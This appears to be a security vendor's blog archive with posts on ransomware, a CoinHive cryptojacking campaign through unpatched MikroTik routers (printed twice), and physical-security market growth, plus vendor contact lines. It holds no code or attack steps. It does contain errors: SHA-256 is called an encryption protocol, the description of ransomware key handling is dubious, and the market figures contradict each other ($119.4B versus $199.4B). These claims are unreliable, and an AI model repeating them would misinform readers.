Ransomware: Present and Future

Modern ransomware is a form of cryptomalware which encrypts the contents of the target hard drive and potentially all storage media on a network and then demands payment for decryption. This is accomplished through traditional threat vectors to lead a user to execute the malware and begin encryption.

After infection and execution of any number of encryption attacks using typical protocols (RSA, SHA-256), the malware will lock down the infected machine and/or network and demand payment, generally in the form of cryptocurrencies, which may or may not actually result in the decryption of the affected files. If the victim complies and sends payment, the threat actor (ideally) releases to them the private key of the public and private key-pair that was used to encrypt their drives.

These attacks have a proven track record for attackers and have resulted in some big payouts, perhaps most notably and well known being the cryptomalware attack against the Hollywood Presbyterian Medical Center, and other hospitals. Because these attacks almost always come with a time limit after which if payment has not been made to the attacker the private key will forever be lost and all files rendered uselessly scrambled and locked, it is not uncommon for institutions to actually pay up. Because the ransom is generally within a “reasonable” range for the targeted institution considering what is at risk of being lost, it is understandable that stress and urgency would drive such a decision. Of course, U.S. Intelligence sources never suggest cooperating with demands.

According to the FBI, ransomware takes in over $1 billion annually just in payments, with a much larger sum devoted to the costs of remediation. Of course, an ounce of prevention is worth a pound of cure, but because security and convenience relate to each other inversely, we will never be able to fully implement the level of prophylactic security care necessary to stop these kinds of threats from reaching our terminals and workstations entirely.

So what are the options once infection has occurred?

1. If you have a recent backup, and the infection is local enough and not spread over an entire network, you can simply purge and re-image the affected machine. If not…

2. Lose your data, or pay up and hope for the best.

Sad as it sounds, those really are the only options available at that point. If you choose to go the route of paying the ransom and hoping for honesty from your attacker, the process generally plays out as follows.

– When the ransomware encrypted your files, it generated a secret key file (private key) and stored it somewhere on your machine.

-Therefore, you must locate and upload this file or data string to the attacker along with the demanded payment in cryptocurrency.

-If they are “honorable” thieves, they process the result and send you a decryption key.

I can only imagine this to be a greatly disheartening process. Incredibly, some cryptomalware platforms even offer a discount on your decryption if you will “infect a friend”.

Moving into the future, we should expect to see ransomware being written to no longer have the need for direct human interaction during the key exchange and payment process. So-called autonomous ransomware eliminates this risky element of one-to-one communication with infected targets where the attacker exposes himself to higher risk.

There is so much more to say about this topic, but the essentials of what an enterprise needs to know have mostly been summed up here. As these cryptomalware attacks generally target the enterprise over the individual in search of the biggest payout possible, organizations need to be aware that threat actors have them in their sights, eagerly awaiting you to slip up and allow them to take hostage your files, machines, and networks.

———————————————————————————————————-

Security Technology of South Texas

Contact us at admin@gostst.com

or call 24/7 (210)-446-4863

———————————————————————————————————-

Sources:

grahamcluley.com

blog.cryptographyengineering.com

Cryptojacking Attack Infects Thousands of ISP-Grade Routers

Cryptomining attack scripts, sometimes referred to as cryptojacking, are a subtle form of malware designed to harness the power of your CPU to mine cryptocurrency for those who develop them. These malware can be spread through infected files and the usual vectors of transmission. Cryptomining can also take place with our without your tacet consent on websites, especially those associated with torrenting and distribution of copywrited materials.

In this case however, a more sophisticated approach has been taken in an effort to spread the reach of the mining campaign through compromising industrial, ISP-grade routers. A hacking campaign has compromised “tens of thousands of MikroTik routers to embed Coinhive cryptomining scripts in websites using a known vulnerability.” (threatpost.com)

Censys.io reports that over 170,000 active Mikrotik devices were infected with the CoinHive site-key ( a single site-key was found across all infections, which indicates a single entity to be behind the attacks). Although the campaign appeared to originally target Brazil, infections are still growing internationally. A search on Shodan (a search engine for security researchers) shows growing tens of thousands of compromised routers outside of Brazil.

MikroTik routers are employed by large enterprises and ISPs in order to serve web pages to multiple thousands or more users each day. This means that each instance of compromise could pay out big for the threat actor.

This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

We’re … talking about potentially millions of daily pages for the attacker,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source: carrier-grade router devices.”

————————————————————————————–

Known Vulnerabilities 

Because the attack capitalizes on a known vulnerability, it is a prime example of what enterprises of all sizes risk when they delay or prevent installation of developer patches. The attack takes advantage of a vulnerability that was actually fixed by MikroTik in a previous patch.

Whoever is behind the attack, it appears they have an intimate understanding of the functionality of this particular router.

Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited,” explained Kenin.

Any MikroTik router users should make sure that their RouterOS is current with security patches, lest they fall prey to this latest cryptojacking campaign. 

The end user still has a few options as well, as cryptojacking can be halted in the web browser itself using (MinerBlock extension) or at the local firewall (CoinBlockerLists). Because the CoinHive script is injected into HTTP traffic, it can generally be avoided by forcing requests to be made over the secure version, HTTPS, depending of course on whether or not the site being accessed supports it.


Source: Threatpost.com  

————————————————————————————–
Contact us at     admin@gostst.com
  
 or call 24/7        (210)-446-4863

$119.4 Billion: Projected Growth of Physical Security Market by 2023

 

Simply put, the physical security market consists of all the security solutions you can walk up to and touch. Cameras, virtual gate guard systems, HOA management systems and more all have elements of physical security. Of course, because all of these solutions are deeply integrated with network and cloud-based technologies, cybersecurity could be considered to be equally important, but is not what we are looking at in this article

 

As risk continues to rise with rapid progress sometimes leaving vulnerabilities unchecked, the demand for physical security, the tried and true barrier between real assets and those seeking to steal or destroy them, will grow along with the risk.

 

A combination of fear generated from media responses to so-called “terror attacks”, advancements in tech in general, and the growing use of IP cameras to perform video surveillance are expected to push the growth of the physical security market worldwide.

According to this report:

https://www.researchandmarkets.com/research/snkm2j/global_physical?w=5

 this growth is expected to be from $84.1 billion in 2018 to $199.4 billion by 2023 with a CAGR (compound annual growth rate) of 7.3%.

 

This report details how the services segment of the market is expected to have the fastest growth rate. Physical security is indispensable for enhancing existing video surveillance through integration of digital (IP) solutions and integrating them with modern IT and network environments.

 

Of course, the larger enterprises are expected to be at the bleeding edge as this all occurs over the next few years, but this doesn’t mean that small or medium businesses need to miss out. While the big players have the greatest pools of revenue to draw from and more infrastructure to protect, the smaller enterprises can see just as much or greater benefit by implementing integrated IP-based physical security sooner rather than later. The best time to step up your security will always be before the attack comes, and not as a reactive measure.

 

 Security Technology of South Texas is a leading provider of cutting-edge physical security products. We have the experience and attention to detail to give you the best for your money when it comes to IP cameras, access control solutions, monitored video, and more.

—————————————————————————————————————————
Contact us at admin@gostst.com
or call 24/7     (210)-446-4863
                 https://securitytoday.com

Cryptojacking

 

Cryptojacking Attack Infects Thousands of ISP-Grade Routers

Cryptomining attack scripts, sometimes referred to as cryptojacking, are a subtle form of malware designed to harness the power of your CPU to mine cryptocurrency for those who develop them. These malware can be spread through infected files and the usual vectors of transmission. Cryptomining can also take place with our without your tacet consent on websites, especially those associated with torrenting and distribution of copywrited materials.

In this case however, a more sophisticated approach has been taken in an effort to spread the reach of the mining campaign through compromising industrial, ISP-grade routers. A hacking campaign has compromised “tens of thousands of MikroTik routers to embed Coinhive cryptomining scripts in websites using a known vulnerability.” (threatpost.com)

Censys.io reports that over 170,000 active Mikrotik devices were infected with the CoinHive site-key ( a single site-key was found across all infections, which indicates a single entity to be behind the attacks). Although the campaign appeared to originally target Brazil, infections are still growing internationally. A search on Shodan (a search engine for security researchers) shows growing tens of thousands of compromised routers outside of Brazil.

MikroTik routers are employed by large enterprises and ISPs in order to serve web pages to multiple thousands or more users each day. This means that each instance of compromise could pay out big for the threat actor.

This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

We’re … talking about potentially millions of daily pages for the attacker,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source: carrier-grade router devices.”

————————————————————————————–

Known Vulnerabilities 

Because the attack capitalizes on a known vulnerability, it is a prime example of what enterprises of all sizes risk when they delay or prevent installation of developer patches. The attack takes advantage of a vulnerability that was actually fixed by MikroTik in a previous patch.

Whoever is behind the attack, it appears they have an intimate understanding of the functionality of this particular router.

Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited,” explained Kenin.

Any MikroTik router users should make sure that their RouterOS is current with security patches, lest they fall prey to this latest cryptojacking campaign. 

The end user still has a few options as well, as cryptojacking can be halted in the web browser itself using (MinerBlock extension) or at the local firewall (CoinBlockerLists). Because the CoinHive script is injected into HTTP traffic, it can generally be avoided by forcing requests to be made over the secure version, HTTPS, depending of course on whether or not the site being accessed supports it.


Source: Threatpost.com  

————————————————————————————–
Contact us at     admin@gostst.com
  
 or call 24/7        (210)-446-4863